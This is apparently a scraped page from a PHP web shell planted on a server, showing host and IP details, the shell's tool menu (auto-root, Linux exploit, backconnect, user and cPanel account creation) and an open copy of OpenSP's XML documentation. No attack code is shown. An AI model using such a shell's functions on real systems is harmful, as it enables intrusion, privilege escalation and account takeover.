Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
opensp-1.5.2 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
364
B
-rw-r--r--
BUGS
222
B
-rw-r--r--
COPYING
1.25
KB
-rw-r--r--
ChangeLog
84.8
KB
-rw-r--r--
NEWS
5
KB
-rw-r--r--
README
487
B
-rw-r--r--
archform.htm
13.4
KB
-rw-r--r--
autoconf.htm
3.12
KB
-rw-r--r--
build.htm
1.62
KB
-rw-r--r--
catalog.htm
7.42
KB
-rw-r--r--
charset.htm
9.87
KB
-rw-r--r--
features.htm
2.12
KB
-rw-r--r--
generic.htm
29.04
KB
-rw-r--r--
ideas.htm
15.44
KB
-rw-r--r--
index.htm
3.07
KB
-rw-r--r--
new.htm
7.38
KB
-rw-r--r--
nsgmls.htm
16.35
KB
-rw-r--r--
opensp-implied.dcl
1.81
KB
-rw-r--r--
releasenotes.html
34.84
KB
-rw-r--r--
sgmldecl.htm
7.36
KB
-rw-r--r--
sgmlnorm.htm
4.25
KB
-rw-r--r--
sgmlsout.htm
11.28
KB
-rw-r--r--
spam.htm
7.05
KB
-rw-r--r--
spcat.htm
2.78
KB
-rw-r--r--
spent.htm
2.03
KB
-rw-r--r--
sx.htm
6.73
KB
-rw-r--r--
sysdecl.htm
1.27
KB
-rw-r--r--
sysid.htm
10.01
KB
-rw-r--r--
xml.htm
1.94
KB
-rw-r--r--
xmlwarn.htm
4.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xml.htm
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML Strict//EN"> <HTML> <HEAD> <TITLE>OpenSP - XML support</TITLE> </HEAD> <BODY> <H1>XML support</H1> <H2>Using OpenSP to parse XML</H2> <P> To enable OpenSP's support for <A HREF="http://www.w3.org/TR/1998/REC-xml-19980210">XML 1.0</A>: <UL> <LI> Set the <SAMP>SP_CHARSET_FIXED</SAMP> environment variable to <SAMP>YES</SAMP>. <LI> Set the <SAMP>SP_ENCODING</SAMP> environment variable to <SAMP>XML</SAMP>. <LI> Set the <SAMP>SGML_CATALOG_FILES</SAMP> environment variable to point to the file <SAMP>pubtext/xml.soc</SAMP>. <LI> Use the <SAMP>-wxml</SAMP> option. <LI> If the document is not supposed to be valid, use <SAMP>-wno-valid</SAMP> option. </UL> <H2>Limitations</H2> <P> OpenSP does not enforce the following XML constraints: <UL> <LI> XML constrains processing instructions with a target matching <CODE>[Xx][Mm][Ll]</CODE>, both in terms of where they can occur and their content. <LI> XML does not allow a parameter separator that is adjacent to a delimiter to be omitted. <LI> XML has constraints on the use of <CODE>&</CODE> in parameter literals. In SGML terms, XML says that the <b>ero</b> delimiter is recognized in a parameter literal, and that it must be followed by an entity reference, but the entity reference is not expanded. </UL> <P> Line ends are normalized using SGML conventions to a CR/LF character pair rather than using the XML convention of a single LF character. <P> OpenSP does not enforce XML's rules on not continuing normal processing after an error. Applications can enforce these if they choose. <H2>Web SGML Adaptations Annex</H2> <P> OpenSP's support for XML is based on <A HREF="http://www.ornl.gov/sgml/sc34/document/0029.htm">Annex K of ISO 8879</A> (the Web SGML Adaptations Annex). The following features of Annex K are not yet implemented: <UL> <LI> <SAMP>#IMPLIED</SAMP> document type name <LI> <SAMP>#ALL</SAMP> and <SAMP>#IMPLICIT</SAMP> in model groups and exceptions </UL> </BODY> </HTML>
Close